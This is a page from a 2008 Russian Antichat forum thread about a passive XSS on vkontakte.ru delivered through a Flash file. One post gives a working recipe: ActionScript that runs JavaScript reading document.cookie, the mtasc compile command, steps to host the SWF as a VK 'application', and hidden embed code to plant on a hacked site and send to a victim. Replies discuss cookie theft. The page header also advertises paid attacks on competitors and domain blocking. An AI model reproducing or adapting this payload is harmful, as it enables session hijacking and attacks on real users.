Форум АНТИЧАТ - vkontakte.ru passive xss (swf)

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
vkontakte.ru passive xss (swf)

Страница 3 из 3

Опции темы

Поиск в этой теме

Опции просмотра

#21

07.06.2008, 12:36

~~NeOz~~

Banned

Регистрация: 26.07.2006

Сообщений: 172

Провел на форуме:
1517663

Репутация: 143

Цитата:

Сообщение от spyro

Обьясните пожалуйста как и что компилить, если можно по подробней.

В строку Выполнить введи это) Только введи полный адрес до mtask.exe

#22

07.06.2008, 12:46

Tigger

Познавший АНТИЧАТ

Регистрация: 27.08.2007

Сообщений: 1,107

Провел на форуме:
5386281

Репутация: 1177

Отправить сообщение для Tigger с помощью ICQ

Ну прописал полный путь к mtask.exe - не получилось (результат нигде не появился)
Пробывал полный путь ко всем файлвам - не получилось (результат нигде не появился)
Как тогда компилить?
И скажите: это еще актуально?

#23

07.06.2008, 13:30

BuG_4F

Участник форума

Регистрация: 20.05.2008

Сообщений: 144

Провел на форуме:
1436858

Репутация: 171

Отправить сообщение для BuG_4F с помощью ICQ

Создай 1.bat , в каталоге с mtask.exe , и в батник впиши ету строчку ....
Запусти ....

#24

07.06.2008, 18:09

spyro

Новичок

Регистрация: 19.04.2008

Сообщений: 20

Провел на форуме:
114829

Репутация: 2

Отправить сообщение для spyro с помощью ICQ

mtask - это трой?

#25

07.06.2008, 19:33

mys-ber

Новичок

Регистрация: 16.02.2008

Сообщений: 5

Провел на форуме:
114509

Репутация: 2

Откомпелировал, загрузил... Я так понял он ворует куки? Куда он его сохраняет..?

#26

07.06.2008, 19:35

Tigger

Познавший АНТИЧАТ

Регистрация: 27.08.2007

Сообщений: 1,107

Провел на форуме:
5386281

Репутация: 1177

Цитата:

Сообщение от BuG_4F

Создай 1.bat , в каталоге с mtask.exe , и в батник впиши ету строчку ....
Запусти ....

Все равно ничего не получилось((

#27

07.06.2008, 19:36

mys-ber

Новичок

Регистрация: 16.02.2008

Сообщений: 5

Провел на форуме:
114509

Репутация: 2

Цитата:

Сообщение от Tigger

Все равно ничего не получилось((

у меня была такая проблемма, когда сам код написан неправильно в hek.as

а так, тут всё понятно:
залей на диск программу, создай батник и впиши, то что в 1 посте.

в соседней теме говорят убрали XSS...

Последний раз редактировалось mys-ber; 07.06.2008 в 19:41..

#28

07.06.2008, 20:21

~~NeOz~~

Banned

Регистрация: 26.07.2006

Сообщений: 172

Провел на форуме:
1517663

Репутация: 143

Да, прикрыли сегодня.

#29

02.07.2008, 14:37

~~ЧЫЫ~~

Banned

Регистрация: 02.07.2008

Сообщений: 3

Провел на форуме:
3721

Репутация: 0

Цитата:

Сообщение от +toxa+

Качаем mtask
Создаём файлик hek.as с содержанием

PHP код:


		
			
class hek{

  function hek() {

  }



  static function main(mc) {

    getURL("javascript:alert(document.cookie);");

  }

}

Далее компилим

Код:

mtasc.exe -swf hek.swf -main -header 1:1:1 hek.as

В настройках делаем доступным сервис "Приложения", обзываем его как-нить и заливаем наш скомпиленный hek.swf +)
Смотрим созданное "приложение" и выдираем ссылку на swf

PHP код:


		
			
...

<script type="text/javascript">

//<![CDATA[

var so = new SWFObject('evil_swf_on_vk','player',"1","1",'9');

so.addParam("allowfullscreen","false");

so.addParam("allownetworking", "all");

...

вот собственно и всё) кодес можно любой

Применение:
1) Можно вставить в сорц похэканного сайта кодес

PHP код:


		
			
<u style="display:none">

<embed src="evil_swf_on_vk" width="1" height="1" type="application/x-shockwave-flash"></embed>

</u>

и кинуть ссылку жертве)

Ссылки по теме:
http://tech.motion-twin.com/zip/mtasc-1.12.zip
http://www.swftools.org/swftools-0.7.0.exe

---
а почему бы не попробовать на mail.ru по крайней мере в опере олерты вылетают.
----
ваш злостный флудер xcedz ^_^

Страница 3 из 3

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Xss Расширенный межсайтовый скриптинг	SNIFF	Чужие Статьи	0	24.11.2005 08:08
Cross Site Scripting FAQ	k00p3r	Уязвимости	6	12.06.2005 16:23

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход